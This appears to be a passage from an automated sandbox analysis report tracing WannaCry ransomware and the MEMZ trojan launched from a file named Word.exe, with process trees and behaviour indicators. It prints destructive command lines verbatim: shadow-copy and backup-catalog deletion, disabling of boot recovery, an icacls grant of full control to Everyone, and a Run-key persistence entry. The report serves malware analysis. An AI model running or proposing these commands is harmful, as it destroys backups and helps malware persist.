Token: 33	4748	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4748	AUDIODG.EXE
Token: SeTcbPrivilege	5388	taskse.exe
Token: SeTcbPrivilege	5388	taskse.exe
Token: SeTcbPrivilege	2628	taskse.exe
Token: SeTcbPrivilege	2628	taskse.exe
Token: SeTcbPrivilege	4020	taskse.exe
Token: SeTcbPrivilege	4020	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exeTaskmgr.exe

pid	process
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Taskmgr.exe

pid	process
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe
5392	Taskmgr.exe

Suspicious use of SetWindowsHookEx 59 IoCs

Processes:

Word.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exeMEMZ.exe@WanaDecryptor@.exewordpad.exe@WanaDecryptor@.exemmc.exemmc.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exewordpad.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe

pid	process
1192	Word.exe
1192	Word.exe
2088	@WanaDecryptor@.exe
2088	@WanaDecryptor@.exe
2500	@WanaDecryptor@.exe
2500	@WanaDecryptor@.exe
1284	@WanaDecryptor@.exe
1284	@WanaDecryptor@.exe
4332	@WanaDecryptor@.exe
2532	@WanaDecryptor@.exe
5012	@WanaDecryptor@.exe
4256	@WanaDecryptor@.exe
4904	@WanaDecryptor@.exe
4828	MEMZ.exe
6052	@WanaDecryptor@.exe
2948	wordpad.exe
2948	wordpad.exe
2948	wordpad.exe
2948	wordpad.exe
2948	wordpad.exe
4828	MEMZ.exe
1468	@WanaDecryptor@.exe
772	mmc.exe
1916	mmc.exe
1916	mmc.exe
4828	MEMZ.exe
5612	@WanaDecryptor@.exe
5612	@WanaDecryptor@.exe
4828	MEMZ.exe
2852	@WanaDecryptor@.exe
4828	MEMZ.exe
4792	@WanaDecryptor@.exe
4416	wordpad.exe
4416	wordpad.exe
4416	wordpad.exe
4416	wordpad.exe
4416	wordpad.exe
4828	MEMZ.exe
4972	@WanaDecryptor@.exe
4828	MEMZ.exe
4828	MEMZ.exe
4944	@WanaDecryptor@.exe
4828	MEMZ.exe
3880	@WanaDecryptor@.exe
4828	MEMZ.exe
4828	MEMZ.exe
5328	@WanaDecryptor@.exe
4828	MEMZ.exe
4828	MEMZ.exe
320	@WanaDecryptor@.exe
4828	MEMZ.exe
4828	MEMZ.exe
7084	@WanaDecryptor@.exe
4828	MEMZ.exe
4828	MEMZ.exe
4828	MEMZ.exe
7144	@WanaDecryptor@.exe
4828	MEMZ.exe
4828	MEMZ.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Word.exeed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execmd.exeMEMZ.exeMEMZ.execmd.exe@WanaDecryptor@.exe

description	pid	process	target process
PID 1192 wrote to memory of 1572	1192	Word.exe	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
PID 1192 wrote to memory of 1572	1192	Word.exe	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
PID 1192 wrote to memory of 1572	1192	Word.exe	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
PID 1572 wrote to memory of 4284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 1572 wrote to memory of 4284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 1572 wrote to memory of 4284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 1572 wrote to memory of 1172	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 1572 wrote to memory of 1172	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 1572 wrote to memory of 1172	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 1572 wrote to memory of 1464	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1572 wrote to memory of 1464	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1572 wrote to memory of 1464	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1572 wrote to memory of 3284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1572 wrote to memory of 3284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1572 wrote to memory of 3284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 3284 wrote to memory of 3736	3284	cmd.exe	cscript.exe
PID 3284 wrote to memory of 3736	3284	cmd.exe	cscript.exe
PID 3284 wrote to memory of 3736	3284	cmd.exe	cscript.exe
PID 1192 wrote to memory of 4236	1192	Word.exe	MEMZ.exe
PID 1192 wrote to memory of 4236	1192	Word.exe	MEMZ.exe
PID 1192 wrote to memory of 4236	1192	Word.exe	MEMZ.exe
PID 4236 wrote to memory of 1336	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 1336	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 1336	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 1844	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 1844	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 1844	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 4108	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 4108	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 4108	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 3696	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 3696	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 3696	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 812	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 812	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 812	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 4828	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 4828	4236	MEMZ.exe	MEMZ.exe
PID 4236 wrote to memory of 4828	4236	MEMZ.exe	MEMZ.exe
PID 4828 wrote to memory of 1524	4828	MEMZ.exe	notepad.exe
PID 4828 wrote to memory of 1524	4828	MEMZ.exe	notepad.exe
PID 4828 wrote to memory of 1524	4828	MEMZ.exe	notepad.exe
PID 1572 wrote to memory of 2088	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@WanaDecryptor@.exe
PID 1572 wrote to memory of 2088	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@WanaDecryptor@.exe
PID 1572 wrote to memory of 2088	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@WanaDecryptor@.exe
PID 1572 wrote to memory of 4084	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1572 wrote to memory of 4084	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1572 wrote to memory of 4084	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4084 wrote to memory of 2500	4084	cmd.exe	@WanaDecryptor@.exe
PID 4084 wrote to memory of 2500	4084	cmd.exe	@WanaDecryptor@.exe
PID 4084 wrote to memory of 2500	4084	cmd.exe	@WanaDecryptor@.exe
PID 2088 wrote to memory of 4736	2088	@WanaDecryptor@.exe	taskhsvc.exe
PID 2088 wrote to memory of 4736	2088	@WanaDecryptor@.exe	taskhsvc.exe
PID 2088 wrote to memory of 4736	2088	@WanaDecryptor@.exe	taskhsvc.exe
PID 1572 wrote to memory of 3348	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1572 wrote to memory of 3348	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1572 wrote to memory of 3348	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1572 wrote to memory of 4544	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1572 wrote to memory of 4544	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1572 wrote to memory of 4544	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1572 wrote to memory of 1284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@WanaDecryptor@.exe
PID 1572 wrote to memory of 1284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@WanaDecryptor@.exe
PID 1572 wrote to memory of 1284	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@WanaDecryptor@.exe
PID 1572 wrote to memory of 4348	1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4284 attrib.exe

pid	process
4284	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Word.exe
"C:\Users\Admin\AppData\Local\Temp\Word.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1192

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
2⤵
- Modifies extensions of user files
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:4284

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:1172

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:1464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 311251678944450.bat
3⤵
- Suspicious use of WriteProcessMemory
PID:3284

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
4⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe co
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4736

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @WanaDecryptor@.exe vs
3⤵
- Suspicious use of WriteProcessMemory
PID:4084

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe vs
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2500

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
5⤵
PID:920

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:3348

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:1284

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qpzmehtw499" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
3⤵
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qpzmehtw499" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
4⤵
- Adds Run key to start application
- Modifies registry key
PID:2880

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5176

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4332

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:3764

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2532

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5180

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5988

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5012

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6044

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5388

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4256

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5768

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4904

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:2632

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6052

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5988

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:4252

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1468

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5476

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:5612

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:5580

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:2716

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2852

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:1736

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:1636

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:748

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4792

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:1328

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
4⤵
PID:3048

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:452

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:1892

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4944

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:632

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:6032

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:704

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3880

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5652

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5328

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:5868

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5928

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:320

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:3524

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:1452

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7084

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:7040

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:7048

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Suspicious use of SetWindowsHookEx
PID:7144

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:848

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
PID:4776

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
PID:7116

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
PID:6700

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4236

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1336

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1844

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4108

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3696

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:812

C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /main
3⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4828

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
4⤵
PID:1524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware
4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
